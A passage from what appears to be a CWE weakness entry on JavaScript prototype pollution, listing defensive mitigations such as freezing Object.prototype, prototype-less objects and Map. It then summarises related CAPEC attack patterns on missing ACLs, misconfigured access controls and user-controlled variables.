By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.